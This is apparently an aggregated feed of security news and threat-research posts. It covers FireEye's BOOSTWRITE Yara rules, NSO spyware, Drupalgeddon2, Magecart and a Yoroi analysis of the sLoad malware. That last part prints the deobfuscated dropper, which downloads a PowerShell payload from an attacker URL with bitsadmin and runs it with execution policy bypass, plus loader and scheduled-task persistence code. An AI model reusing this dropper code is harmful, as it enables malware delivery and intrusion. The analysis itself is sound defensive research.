pe.number_of_signatures > 0 and not for all i in (0..pe.number_of_signatures - 1):
     pe.signatures[i].valid_on(pe.timestamp)

Figure 3: Excerpt of NCC Group’s research Yara rule

There are other PE Authenticode anomalies that can also be represented as Yara rules to surface similarly suspicious files. Of note, this signed BOOSTWRITE sample has no counter signature and, while the unauthenticated attributes timestamp structure is present, it is empty. In preparing this blog, FireEye’s Advanced Practices team identified a possible issue with VirusTotal’s parsing of signed executable timestamps as seen in Figure 4.



Figure 4: Inconsistency in VirusTotal file signature timestamps for the signed BOOSTWRITE sample

FireEye filed a bug report with Google to address the discrepancy in VirusTotal in order to remove confusion for other users.

To account for the detection weaknesses introduced by techniques like code signing, our Advanced Practices team combines the malicious confidence spectrum that comes from ML detection systems with file oddities and anomalies (weak signals) to surface highly interesting and evasive malware. This technique was recently described in our own Dr. Steven Miller’s Definitive Dossier of Devilish Debug Details. In fact, the exact same program database (PDB) path-based approach from his blog can be applied to the toolmarks seen in this sample for a quick hunting rule. Figure 5 provides the PDB path of the BOOSTWRITE samples from this blog.

F:\projects\DWriteImpl\Release\DWriteImpl.pdb

Figure 5: BOOSTWRITE PDB path

The Yara rule template can be applied to result in the quick rule in Figure 6.

rule ConventionEngine_BOOSTWRITE
{
 meta:
     author = "Nick Carr (@itsreallynick)"
     reference = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
strings:
     $weetPDB = /RSDS[\x00-\xFF]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00/ nocase
 condition:
     (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $weetPDB and filesize < 6MB
}

Figure 6: Applying BOOSTWRITE’s PDB path to a Yara rule

We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.

rule Exports_BOOSTWRITE
{
meta:
     author = "Steve Miller (@stvemillertime) & Nick Carr (@itsreallynick)"
strings:
     $exyPants = "DWriteImpl.dll" nocase
condition:
     uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $exyPants at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) and filesize < 6MB
}

Figure 7: Applying BOOSTWRITE’s export DLL names to a Yara rule (Note: this rule was updated following publication. It previously read "module_ls.dll", which is for Turla and unrelated.)

Of course, resilient prevention capabilities are needed and to that end, FireEye detects this activity across our platforms. Table 6 contains several specific detection names from a larger list of detection capabilities that captured this activity natively.

Platform

Signature Name

Endpoint Security

MalwareGuard ML detection (unsigned variants)

Network Security and Email Security

Malware.binary.dll (dynamic detection)
MalwareGuard ML detection (unsigned variants)
APTFIN.Dropper.Win.BOOSTWRITE (network traffic)
APTFIN.Backdoor.Win.RDFSNIFFER (network traffic)
FE_APTFIN_Dropper_Win_BOOSTWRITE (static code family detection)
FE_APTFIN_Backdoor_Win_RDFSNIFFER (static code family detection)

Table 6: FireEye detection matrix

Don’t Sweat the Techniques – MITRE ATT&CK Mappings

BOOSTWRITE

ID

Tactic

BOOSTWRITE Context

T1022

Data Encrypted

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection

T1027

Obfuscated Files or Information

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection

T1038

DLL Search Order Hijacking

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll

T1116

Code Signing

BOOSTWRITE variants were observed signed by a valid CA

T1129

Execution through Module Load

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll

T1140

Deobfuscate/Decode Files or Information

BOOSTWRITE decodes its payloads at runtime using using a ChaCha stream cipher with a 256-bit key and 64-bit IV

RDFSNIFFER

ID

Tactic

RDFSNIFFER Context

T1106

Execution through API

RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface

T1107

File Deletion

RDFSNIFFER has the capability of deleting local files

T1179

Hooking

RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface

Acknowledgements

The authors want to thank Steve Elovitz, Jeremy Koppen, and the many Mandiant incident responders that go toe-to-toe with FIN7 regularly, quietly evicting them from victim environments. We appreciate the thorough detection engineering from Ayako Matsuda and the reverse engineering from FLARE’s Dimiter Andonov, Christopher Gardner and Tyler Dean. A special thanks to FLARE’s Troy Ross for the development of his PE Signature analysis service and for answering our follow-up questions. Shout out to Steve Miller for his hot fire research and Yara anomaly work. And lastly, the rest of the Advanced Practices team for both the unparalleled front-line FIN7 technical intelligence expertise and MITRE ATT&CK automated mapping project – with a particular thanks to Regina Elwell and Barry Vengerik.

Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware

NSO Group ‘s surveillance spyware made the headlines again, this time the malware was used to spy on 2 rights activists in Morocco according Amnesty International.

Amnesty International collected evidence of new abuses of the NSO Group ‘s surveillance spyware, this time the malware was used to spy two rights activists in Morocco.

Experts at Amnesty International analyzed the device of evidence of Abdessadak El Bouchattaoui and confirmed it was targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.

“After checking his devices for evidence of targeting, Amnesty International was able to confirm that Abdessadak El Bouchattaoui was indeed targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.” reads the analysis published by Amnesty International.

The organization also discovered that the spyware was also used to spy on Maati Monjib, the right group believes the operation is part of state-sponsored repression of human rights defenders.

Bouchattaoui is a lawyer and HRD, in February 2017, a court in Al Hoceima sentenced him to 20 months in prison and a fine for online posts in which he criticized the use of excessive force by the authorities during the social justice protests in the Hirak El-Rif across 2016 and 2017. Monjib is a historian and a columnist, co-founder of the NGO Freedom that in 2015 was accused of threatening the internal security of the state ”through “propaganda.”

NSO Group Pegasus

The victims were targeted with messages related to the Hirak El-Rif movement and the subsequent repression by the Moroccan security forces. The messages included links that once clicked by the victims will start the attack chain that would allow the attacker to remotely control the device.

The links used in these attacks are similar to the ones detected by in June 2018 by Amnesty International in operations against an Amnesty staff member and a Saudi HRD.

“SMS messages sent to Moroccan Human Rights Defenders, as documented in this report, also carry similar links to the same set of Internet infrastructure attributed to NSO Group.” states the report.

“NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising serious concerns that Moroccan security agencies are behind the surveillance,”

NSO Group refuses any accusation and claims that its surveillance technology is only used for lawful purposes. 

In May, Amnesty International filed a lawsuit against Israeli surveillance firm NSO, the lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

Pierluigi Paganini

(SecurityAffairs – NSO Group, hacking)

The post Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware appeared first on Security Affairs.

Developer hacked back Muhstik ransomware crew and released keys

One of the victims of the Muhstik ransomware gang who initially paid the ransomware, decided to hack back the crooks and released their decryption keys.

Tobias Frömel, is a German software developer, who was a victim of the Muhstik ransomware. Frömel initially paid the ransom to decrypt his files, but later decided to get his revenge on the crooks.

The expert hacked the server used by the Muhstik ransomware gang and released the decryption keys for all the victims of the group.

Muhstik is piece of ransomware that has been first detected in the wild late September while targeting QNAP network-attacked storage (NAS) devices.

Attackers first get access to the NAS devices through brute-force attacks on the built-in phpMyAdmin service, then encrypt their content and append the “.muhstik” extension to their filenames.

This ransomware targets network-attacked storage (NAS) devices made by Taiwanese hardware vendor QNAP. The gang behind the Muhstik ransomware is brute-forcing QNAP NAS devices that use weak passwords for the built-in phpMyAdmin service.

“The Muhstik ransomware is reportedly being used to target QNAP NAS devices. Devices using weak SQL server passwords and running phpMyAdmin may be more vulnerable to attacks.” states the security advisory published by QNAP.

“We strongly recommend that users act immediately to protect their data from possible malware attacks.

The developer published on Pastebin the 2,858 decryption keys found on the hacked server and clarified that he was aware that the hack back is not legal.

hope you all got that decrypter execution file, if not i still have it and yeah, I know it was not legal from me,” wrote the researcher. “I’m not the bad guy here,”

Frömel also published a decrypter that could be used by the victims of the Muhstik ransomware to unlock their files.

In the meantime, Frömel has been busy notifying Muhstik victims on Twitter about the decrypter’s availability, advising users against paying the ransom.

According to ZDNet, which first reported the news, Frömel notified authorities and also provided information to track down members of the Muhstik gang.

This case highlights the importance of working with the authorization of law enforcement before conducting hacking back.

Pierluigi Paganini

(SecurityAffairs – Muhstik ransomware, hacking)

The post Developer hacked back Muhstik ransomware crew and released keys appeared first on Security Affairs.

New Unpatchable iPhone Exploit Allows Jailbreaking

A new iOS exploit allows jailbreaking of pretty much all version of the iPhone. This is a huge deal for Apple, but at least it doesn't allow someone to remotely hack people's phones.

Some details:

I wanted to learn how Checkm8 will shape the iPhone experience­ -- particularly as it relates to security­ -- so I spoke at length with axi0mX on Friday. Thomas Reed, director of Mac offerings at security firm Malwarebytes, joined me. The takeaways from the long-ranging interview are:

  • Checkm8 requires physical access to the phone. It can't be remotely executed, even if combined with other exploits.

  • The exploit allows only tethered jailbreaks, meaning it lacks persistence. The exploit must be run each time an iDevice boots.

  • Checkm8 doesn't bypass the protections offered by the Secure Enclave and Touch ID.

  • All of the above means people will be able to use Checkm8 to install malware only under very limited circumstances. The above also means that Checkm8 is unlikely to make it easier for people who find, steal or confiscate a vulnerable iPhone, but don't have the unlock PIN, to access the data stored on it.

  • Checkm8 is going to benefit researchers, hobbyists, and hackers by providing a way not seen in almost a decade to access the lowest levels of iDevices.

Also:

"The main people who are likely to benefit from this are security researchers, who are using their own phone in controlled conditions. This process allows them to gain more control over the phone and so improves visibility into research on iOS or other apps on the phone," Wood says. "For normal users, this is unlikely to have any effect, there are too many extra hurdles currently in place that they would have to get over to do anything significant."

If a regular person with no prior knowledge of jailbreaking wanted to use this exploit to jailbreak their iPhone, they would find it extremely difficult, simply because Checkm8 just gives you access to the exploit, but not a jailbreak in itself. It's also a 'tethered exploit', meaning that the jailbreak can only be triggered when connected to a computer via USB and will become untethered once the device restarts.


Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild

Researchers from Akamai uncovered a new campaign targeting the Drupalgeddon2 vulnerability to deliver malware.

The popular security expert Larry W. Cashdollar from Akamai has uncovered a new campaign targeting the popular Drupalgeddon2 vulnerability (CVE-2018-7600) to deliver malware.

Drupalgeddon2 is a “highly critical” vulnerability that affects Drupal 7 and 8 core, it could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing an URL.

The Drupal development team has fixed the vulnerability in March 2018, but hackers continue to target Drupalgeddon2 in the wild.

The campaign recently discovered by Cashdollar sees the attackers attempting to run malicious code embedded in a .gif file.

The expert explained that the campaign is currently not widespread, it is targeting a broad range of high profile websites.

“I observed an attack that  is designed to run code that is embedded inside a .gif file. While embedding code in image file isn’t a new attack method, I haven’t seen this method in quite some time.” reads the analysis published by Cashdollar.

“The attack traffic doesn’t appear to be widespread at this time, nor does it appear to be specifically targeting a single industry vertical. Currently, the attack traffic seems to be directed towards a random assortment of high profile websites. The code I will be examining is embedded in the file index.inc.gif, which appears to be hosted on a compromised bodysurfing website located in Brazil.”

One of .gif files analyzed by the experts was hosted on a compromised bodysurfing website located in Brazil. The file contained obfuscated PHP code designed to decode base64-encoded malware that was stored by threat actors in a variable.

“The commands clean up any previous installations and then replace any .htaccess configurations with versions that have less restrictive settings.” continues the analysis. Then two different files are downloaded and then executed. The first, index.inc.gif, contains obfuscated PHP code. It contains a GIF header, but the rest of the file is PHP code obscured using gzip compression, rot13, and base64 encoding.”

The malware supports several functions, such as scanning local files for credentials, sending email with the discovered credentials, replacing the local .htaccess file, displaying MySQL my.cnf configuration files, execute a remote file that is gz compressed and base64 encoded, showing system information, renaming files, uploading files, and launching a web shell.

The campaign also delivers a piece of malware stored in a .txt containing a Perl script that leverages Internet Relay Chat (IRC) for command and control (C&C) communication. The malware implements common RAT features and is also able to launch distributed denial-of-service (DDoS) attacks.

The malware also implements functionalities to gather information from the local system and to control infected systems, it also supports a SQL flood command. The fact that attackers are still exploiting the Drupalgeddon2 flaw highlights the importance of patch management in enterprises.

“Critical vulnerabilities will be targeted, even if their public disclosure date is over a year old. When the vulnerability’s exploitation is simple, which is the case with Drupalgeddon2, attackers will automate the process of scanning, exploitation, and infection when there are poorly maintained and forgotten systems.” Cashdollar concludes. “This creates a problem for enterprise operations and web administrators, as these old forgotten installs are often connected to other critical systems — creating a pivot point on the network.”

“Maintaining patches in a timely fashion, as well as properly decommissioning servers if they’re no longer being used is the best preventative measure that administrators and security teams can take.” 

Pierluigi Paganini

(SecurityAffairs – Drupalgeddon2, hacking)

The post Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild appeared first on Security Affairs.

2020: A new paradigm in Cybersecurity

Estimated reading time: 3 minutes

As we enter a new decade, it is important to look back and learn from the decade that is about to end. From 2010 to 2019, cybersecurity moved at a furious pace. Threats erupted in multiple new vectors, spreading far and wide and shutting down thousands of organizations at the blink of an eye.

State-sponsored cybersecurity threats became an imminent danger with governments waking up to the sheer horror of the scale of damage it caused. Social media giants were increasingly viewed with suspicion by regulators about how they use the data of their users.

The terms ‘Dark Web’ and ‘Deep Web’ have become common among not just cybersecurity specialists, but also regular users.

A new era of cybersecurity

Looking at that pace of change, one thing is quite certain – 2020 and the start of the next decade will bring about a new paradigm in cybersecurity.

This paradigm shift is likely to be driven by the fear of the damages cybersecurity attacks can cause. One figure estimates the cost of cyber attacks to the world to rise to $6 trillion by 2020. A key figure in that calculation is the unprecedented rise of connected devices.

As the world moves to an Internet of Things (IoT) era, an increasing number of devices will be connected to the Internet, enabling a more customized user experience. That, however, also increases the number of devices at risk of cyberattacks. Gartner estimates the number of Internet-connected devices to be 20 billion by 2020.

The role of the state will increase

Expect the role of the state in regulating cybersecurity to increase mainly because cyberattacks are starting to affect nation-states on a larger scale. The biggest countries in the world have instituted cybersecurity departments, recognizing the need to defend themselves against cyber warfare. Experts speculate that cyber threats could pose all sorts of problems for countries, with physical repercussions as well – imagine a cyber attack on a national power grid by an enemy state, wiping out the power system of thousands of homes and causing an emergency.

Recognizing the risks, governments will try and bring in more regulations for domains that have traditionally operated much freely till now. It will be a challenge for enterprises to stay abreast of regulations and maintain compliance.

Data privacy and the questions around it

Very few other organizations had a more action-packed decade than Facebook. As a social media behemoth, Mark Zuckerberg’s company rose to dizzying heights before being engulfed in scandals which caused it to be viewed with suspicion. The lesson from this debacle is clear – there is now a renewed awareness of the importance of the data users provide to enterprises. Don’t expect this trend to subside any time soon – enterprises will have to deal with more questions on how exactly and what exactly they are doing with the data they collect.

The race towards automation as a tool to prevent cyber attacks

Automation is already being explored as a tool to combat cyber attacks. A 2019 Ponemon survey observed that 79% of respondents from 1,400 IT and IT security practitioners across the UK, US and APAC were in organizations which currently used or planned to use automation within the next three years. These respondents also said that log analysis would be the most common type of security activity that would be automated in the next three years, followed by malware analysis and threat hunting.

Automation will help reduce the load on an Information Security team which is already suffering from skill shortage and help enable the fulfilment of time-consuming, manual and mundane tasks.

Artificial Intelligence – in attack and defence

Artificial intelligence will be a double-edged sword in 2020 and beyond. AI-powered cybersecurity solutions in coordination with human intelligence will continue to be extremely useful when dealing with large amounts of data. AI solutions can analyze this data to find patterns and anomalies, helping to understand the environment. This way, it can understand concepts such as normalcy and false positives and flag when there are events which are not “normal”.

In the same vein though, the usage of AI in launching cyber attacks will also increase. Cybercriminals also use AI to run their own research and find loopholes in enterprises. Cybercriminals can also use AI to scan through huge tracts of data quickly and find Personally Identifiable Information (PII) which can be a major cybersecurity risk.

The year 2020 promises to mark a paradigm shift in the world of cybersecurity, giving rise to new solutions, new threats and new means of tackling them.

To share actionable insights on Cybersecurity at the dawn of 2020, Seqrite has put together an exclusive summit for knowledge sharing on the future of Cybersecurity.

The post 2020: A new paradigm in Cybersecurity appeared first on Seqrite Blog.

PoS malware infections impacted four restaurant chains in the U.S.

Four restaurant chains in the U.S. disclosed payment card theft via PoS malware that took place over the summer.

Four restaurant chains in the United States disclosed security breaches that impacted their payment systems over the summers, crooks used PoS malware to steal payment card data of the customers.

The restaurant chains are McAlister’s Deli, Moe’s Southwest Grill, Schlotzsky’s, and Hy-Vee, they confirmed the presence of PoS malware at certain locations.

Moe’s, McAlister’s and Schlotzsky’s are owned by Focus Brands, the fact that they simultaneously disclosed the payment card breaches suggests that attackers were able to compromise some infrastructure shared by the two restaurant chains.

The three restaurant chains confirmed that hackers compromised the payment systems in a period between April 29, 2019 and July 22, 2019. 

“A thorough investigation is being conducted and is nearly complete. It appears that unauthorized code designed to copy payment card data from cards used in person was installed in certain corporate and franchised restaurants at different times over the general period of April 29, 2019 to July 22, 2019.” reads an excerpt of a data breach notification published by the three brands.

Only Schlotzsky’s reported that the attacks begun on April 11, 2019, the other two confirmed that attacks started on April 29.

The three restaurant chains reported that the PoS malware was discovered only at certain locations, and at most locations it was present for only a few weeks in July.

The brands did not reveal the number of impacted customers.

Customers were initially alerted about the incident on August 20, when the restaurant chains were investigating the security incidents.

The PoS malware was designed to capture data from the magnetic stripe of a payment card during the payment process, including the card number, expiration date, and internal verification code, and sometimes it the cardholder name.

The fourth brand that suffered a payment card breach is Hy-Vee, the restaurant chain provided an update to the notice of payment card data incident released on August 14.

The company confirmed that on July 29, crooks compromised some payment processing systems, in this case, the PoS malware remained active more than a month.

The update provided by the company revealed that infections at the fuel pumps began on December 14, 2018, while payment systems at restaurants and drive-thru coffee shops were infected starting January 15.

“The specific timeframes when data from cards used at these locations involved may have been accessed vary by location over the general timeframe beginning December 14, 2018, to July 29, 2019 for fuel pumps and beginning January 15, 2019, to July 29, 2019, for restaurants and drive-thru coffee shops.” reads the update provided by the company. “There are six locations where access to card data may have started as early as November 9, 2018, and one location where access to card data may have continued through August 2, 2019.”

The company also published a Location Look Up Tool to determine the Hy-Vee impacted locations.

Pierluigi Paganini

(SecurityAffairs – restaurant chains, PoS malware)

The post PoS malware infections impacted four restaurant chains in the U.S. appeared first on Security Affairs.

Magecart hackers are expanding their operations

Cybercrime gangs under the Magecart umbrella continue to compromise e-commerce platforms to steal payment card data from users worldwide.

Hacker groups under the Magecart umbrella continue to target organizations payment card data with so-called software skimmers. Security firms have monitored the activities of a dozen groups at least since 2010

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of the groups is long and includes several major platforms such as British AirwaysNeweggTicketmasterMyPillow and Amerisleep, and Feedify

Millions of Magecart instances were detected over time, security experts discovered tens of software skimming scripts.

In a report recently published by RiskIQ, experts estimate that the group has impacted millions of users. RiskIQ reports a total of 2,086,529 instances of Magecart detections, most of them are supply-chain attacks.

“Suppliers can include vendors that integrate with sites to add or improve site functionality or cloud resources from which websites pull code, such as Amazon S3 Buckets. These third-parties integrate with thousands of websites” states the report.

Magecart group tracked as MG5 (Group 5) appears to be the most sophisticated and prolific group. MG5 focuses on supply chain attacks, it is responsible for the hack of hundreds of websites and providers such as SociaPlus and Inbenta.

In June, the gang made the headlines again, after infecting over 17,000 domains by targeting improperly secured Amazon S3 buckets

Recently, IBM researchers observed one of the MG5 group 5 using malicious code to inject into commercial-grade layer 7 L7 routers.

According to RiskIQ, many groups under the umbrella still focus on e-commerce sites powered with the Magento shopping or OpenCart platform.

Magecart

Following a consolidated pattern of attack that is common in the hacking community, Magecart attempt to exploit vulnerabilities that the victims have yet to patch even is security updates have been released by Magento and other software vendors.

Attackers also look for new attack vectors to distribute their software skimming, such as compromising creative ad script tags to leverage digital ad networks to generate traffic to their skimmers and hit thousands of sites at once.

RiskIQ report revealed that of all malicious advertisements it has analyzed, the 17% is associated with the Magecart groups.

Below other interesting insights included in the report:

  • 17% of all Malvertisements detected by RiskIQ contain Magecart skimmers
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely.
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts.
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains. 
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that’s gone offline to assume access to these breached sites. 

The full report, containing additional insights and information, is available for download here: https://www.riskiq.com/research/magecart-growing-threat/

Pierluigi Paganini

(SecurityAffairs – software skimmers, hacking)

The post Magecart hackers are expanding their operations appeared first on Security Affairs.

Is Your Browser Haunted With Ghostcat Malware?

October is finally among us, and things are spookier than usual. One ghost causing some hocus pocus across the World Wide Web is Ghostcat-3PC, a browser-hijacking malware that has launched at least 18 different malvertising campaigns in the last three months. According to SC Magazine, Ghostcat’s goal is to hijack users’ mobile browsing sessions and is specifically targeting website visitors in the U.S. and Europe.

How exactly does this ghost begin its haunting? The infection begins when a user visits a particular website and is served a malicious advertisement. When this occurs, Ghostcat fingerprints the browser, which is when information is collected about a device for the purpose of identification, to determine if the ad is running on a genuine webpage. Ghostcat also checks if the ad is running on one of the over 100 online publishers’ pages that have been specifically targeted by this campaign. If both of these conditions are met, then the malware serves a malicious URL linked to the ad.

From there, this malicious URL delivers obfuscated JavaScript, which creates an obscure source or machine code. The attackers behind Ghostcat use this technique to trick the publishers’ ad blockers, preventing them from detecting malicious content. The code also checks for additional conditions necessary for the attack. These conditions include ensuring that the malware is being run on a mobile device and a mobile-specific browser, that the device is located in a targeted country, and that it is being run on a genuine website as opposed to a testing environment. If the malware concludes that the browsing environment fits the descriptions of their target, then it will serve a fraudulent pop-up, leading the user to malicious content.

So, what are some proactive steps users can take to avoid being haunted by Ghostcat? Follow these tips to avoid the malware’s hocus pocus:

  • Watch what you click. Avoid clicking on unknown links or suspicious pop-ups, especially those that come from someone you don’t know.
  • Be selective about which sites you visit. Only use well-known and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site altogether.
  • Surf the web safely. You can use a tool like McAfee WebAdvisor, which will flag any sites that may be malicious without your knowing.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Is Your Browser Haunted With Ghostcat Malware? appeared first on McAfee Blogs.

Threat Roundup for September 27 to October 4

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 27 to Oct 4. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10042019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The sLoad Threat: Ten Months Later

Since September 2018, SLoad (tracked as TH-163) is the protagonist of an increasing and persistent wave of attacks against Italian organizations.

Introduction

SLoad (TH-163) is the protagonist of increasing and persistent attack waves against the Italian panorama since Q3 2018 and then in 2019 (e.g N020419N040619N010819), but also against the UK and Canada as reported by Proofpoint. Ten months ago, we wrote about the complex infection chain the sLoad malware threat was using during its attack campaigns, and today we are looking at the evolution of the threat by dissecting one of its latest attacks.

During our CSDC monitoring operation, we recently noticed some changes in the infamous attack waves related to sLoad, which is known for adopting a complex infection chain using to spread additional malware. For this reason Cybaze-Yoroi ZLAB dissected one latest ones.

Technical Analysis

According to CERT-PA investigations, the malware has recently been delivered using legit certified emails (PEC). These recent attack waves were targeting Italians Organizations and consultants affiliated to Professional associations, such as lawyers and civil engineers. Once again the attachment is a malicious zip. 

Figure 1: Example of mail (source:CERT-PA)

The Infection Chain

Figure 2: Files contained in attachment file zip

This time the zip does not hide powershell code, such the appended one recovered in the past waves. The archive contains two files: a corrupted PDF file and a VBScript. The first one is designed to deceive the unaware user and force him to open the runnable script.

In the following tables are shown some basic information about samples contained in the zip archive.

Hash30d6f6470e145a1d1f2083abc443148c8e3f762025ca262267ae2e531b2e8ab4
Threat.vbs dropper
Brief DescriptionSload visual basic script loader
Ssdeep192:Fb1TpsF8Z1mZcwfD0VCmA7VETYM/2IVKfCH:FbQjZZfDsA7G2zfCH

Table 1: Information about SLoad .vbs dropper

Hash43db5fcb75d50a5516b687b076be5eb1aaec4b51d8d61a60efc69b383c1d757c
Threat.pdf file
Brief DescriptionSload corrupted pdf file
Ssdeep1536:mmD8g29U+A092Ljr/N0VyvD/ABVqYA7hq4XoZxXjdY4u/dQV:FdLKQjrFgyvsB0YA1q4YZxpWQV

Table 2: Information about SLoad .pdf file

Opening the vbs dropper is possible to see an obfuscated script containing several junk instructions like unused variables and commented codes. After a deobfuscation phase is possible to see the inner logic. The purpose of this script is launch start a powershell script retrieved from the attacker infrastructures and, in the meantime, decoy the victim.

  1. On Error Resume Next
  2. Set ZCzG = CreateObject(“Scripting.FileSystemObject”)
  3. Set PavfQt = WScript.CreateObject (“WScript.Shell”)
  4. Set XaiX = ZCzG.GetFolder(“c:\Users\”)
  5. Recurse(XaiX)
  6. PavfQt.run “bitsadmin /transfer OkFCVS /download /priority FOREGROUND https://dreamacinc.com/UCP9dATGyt6mJ/srdzHcN4bWUum.jpg c:\Users\Public\Downloads\RSbYHuPO.ps1”,0,True
  7. i=0
  8. Do While i < 1
  9. If (ZCzG.FileExists(“c:\Users\Public\Downloads\RSbYHuPO.ps1”)) Then
  10. i=1
  11. End If
  12. WScript.Sleep(2280)
  13. Loop
  14. PavfQt.run “powershell.exe -ep bypass -file c:/users/public/downloads/RSbYHuPO.ps1 “,0,True
  15. Sub Recurse(JFLY)
  16. If IsAccessible(JFLY) Then
  17. For Each oSubFolder In JFLY.SubFolders
  18. Recurse oSubFolder
  19. Next
  20. For Each RIst In JFLY.Files
  21. If InStr(RIst.Name,”.pdf”) > 0 Then
  22. PavfQt.run “explorer “+JFLY+”\”+RIst.Name
  23. End if
  24. Next
  25. End If
  26. End Sub
  27. Function IsAccessible(XaiX)
  28. On Error Resume Next
  29. IsAccessible = (XaiX.SubFolders.Count >= 0)
  30. End Function

Code snippet 1: Deobfuscated vbs dropper

The malware downloads a fake jpg using the using “bitsadmin.exe”  tool from “hxxps://dreamacinc[.com/UCP9dATGyt6mJ/srdzHcN4bWUum[.jpg”. The usage of native tools allow the script to operate under the radar avoiding several AVs controls. The fake jpg actually contains a powershell script. 

  1. $oLZz2= “C:\Users\admin\AppData\Roaming”;
  2. $YwbpkcN9XUIv1w=@(1..16);
  3. […]
  4. $main_ini=’76492d1116743f0423413b16050a5345MgB8ADUAVAB4 […] AMQAyAGYA’;
  5. $main_ini | out-file $PaIQGLoo’\main.ini’;
  6. $domain_ini=’76492d1116743f0423413b1605 […] YwBlAA==’;
  7. $domain_ini | out-file $PaIQGLoo’\domain.ini’;
  8. […]
  9. try{ […]
  10. }catch{$yC0iBerAupzdtf5Z=Get-Process -name powershell*;
  11. if ($yC0iBerAupzdtf5Z.length -lt 2){
  12. $EXhfbIPG7pUAEZzgZEnM = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
  13. $r=8;
  14. $B3xcDMBF=$EXhfbIPG7pUAEZzgZEnM.Substring(0,$r);
  15. $zjGQzSypyGPthusR = $047MydhkAAfp1W+”\”+$B3xcDMBF;
  16. $sv8eJJhgWV3xAN7Uu=@(1..16);
  17. $umwTVcIoudRlXjR6yAQQ= Get-Content “main.ini”$MLUkmHrgbpKyVEt8nS= ConvertTo-SecureString $umwTVcIoudRlXjR6yAQQ -key $sv8eJJhgWV3xAN7Uu;
  18. $AKXy3OFCowsfie = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MLUkmHrgbpKyVEt8nS);
  19. $DBR4S3t = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($AKXy3OFCowsfie);
  20. Invoke-Expression $DBR4S3t;
  21. }
  22. } | out-file $PaIQGLoo’\’$H3z9RnzIihO8′.ps1′
  23. $OFHc0H4A=’ /F /create /sc minute /mo 3 /TN “S’+$rs+$fLCg9ngJqRHX36hfUr+'” /ST 07:00 /TR “wscript /E:vbscript ‘+$PaIQGLoo+’\’+$JxdRWnHC+’.tmp”‘;
  24. start-process -windowstyle hidden schtasks $OFHc0H4A; […]

Code snippet 2: Downloaded powershell code

The first action the script  does is to set a scheduled task to grant persistence on the infected machine. Then, after selection a random active process on infected machine (“System” in this specific infection) and concatenation it with the “%AppData%\Roaming” path, it stores four different files in his installation folder.

  • <random_name>.tmp
  • <random_name>.ps1
  • domain.ini
  • main.ini

All of them are embedded in the script; furthermore, two of them (“domain.ini” and “main.ini”)  are encrypted using the “ConvertFrom-SecureString”  native function. Then, the script runs the “UoqOTQrc.tmp” file, having the only purpose to execute the “UoqOTQrc.ps1” file contained in the same folder.

Figure 3: Files created in “%AppData%\Roaming\<active_process>\”
  1. Dim str, min, max
  2. Const LETTERS = “abcdefghijklmnopqrstuvwxyz”
  3. min = 1
  4. max = Len(LETTERS)
  5. Randomize
  6. […]
  7. Set objFSO=CreateObject(“Scripting.FileSystemObject”)
  8. Set winssh = WScript.CreateObject (“WScript.Shell”)
  9. fName=RandomString(10)
  10. JAcalshy=RandomString(4)
  11. fZgxNPDMnu=RandomString(4)
